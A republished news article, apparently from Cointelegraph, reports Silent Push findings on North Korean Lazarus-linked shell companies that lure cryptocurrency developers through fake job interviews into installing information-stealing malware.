Source: Cointelegraph
Original: “North Korean hackers set up 3 shell companies to scam cryptocurrency developers”

A branch of the hacker organization Lazarus, linked to North Korea, has established 3 shell companies, two of which are located in the United States, with the aim of spreading malware to unsuspecting users.

According to a report by Silent Push threat analysts on April 24, these 3 fake cryptocurrency consulting companies—BlockNovas, Angeloper Agency, and SoftGlide—are being exploited by the North Korean hacker group Contagious Interview to distribute malware through fake job interviews.

Zach Edwards, a senior threat analyst at Silent Push, stated in a post on the X platform on April 24 that two of the shell companies are registered as legitimate businesses in the United States.

"These websites and numerous accounts on job recruitment sites are being used to lure people into applying for jobs," he said.

"During the job application process, when applicants attempt to record self-introduction videos, error messages will appear. The solution is a simple click fix and copy-paste operation, and if unsuspecting developers complete this process, it will lead to malware infection."

According to the Silent Push report, the hackers used three types of malware—BeaverTail, InvisibleFerret, and Otter Cookie.

BeaverTail is primarily used for information theft and loading subsequent malware. OtterCookie and InvisibleFerret mainly target sensitive information, including cryptocurrency wallet keys and clipboard data.

Silent Push analysts noted in the report that the hackers are searching for targets through GitHub, job recruitment sites, and freelance platforms.

The scam also includes hackers creating employee profiles for these 3 shell cryptocurrency companies using AI-generated images and stealing photos of real individuals.

"This network employs a large number of fake employees and images stolen from real people. We have documented some obvious fakes and stolen images, but it is important to recognize that the impersonation tactics in this operation are different," Edwards said.

"In one example, the threat actor obtained a photo of a real person and then seemingly created subtle variations of the same photo using AI image modification tools."

This malware attack campaign began in 2024. Edwards stated that there have already been publicly reported victims.

Silent Push found that two developers became targets of the attack, one of whom reportedly had their MetaMask wallet compromised.

The Federal Bureau of Investigation has shut down at least one of the companies.

"The FBI took over the domain of Blocknovas, but Softglide and some of their other infrastructure are still operational," Edwards said.

In March, at least three cryptocurrency founders reported that they thwarted attempts by suspected North Korean hackers to steal sensitive data through fake Zoom calls.

Organizations like the Lazarus Group are prime suspects in some of the largest-scale cyber thefts in the Web3 space, including the $1.4 billion hack of Bybit and the $600 million hack of the Ronin network.

Related: DeFi platform KiloEx to compensate $7.5 million to users affected by hack.

免责声明：本文章仅代表作者个人观点，不代表本平台的立场和观点。本文章仅供信息分享，不构成对任何人的任何投资建议。用户与作者之间的任何争议，与本平台无关。如网页中刊载的文章或图片涉及侵权，请提供相关的权利证明和身份证明发送邮件到support@aicoin.com，本平台相关工作人员将会进行核查。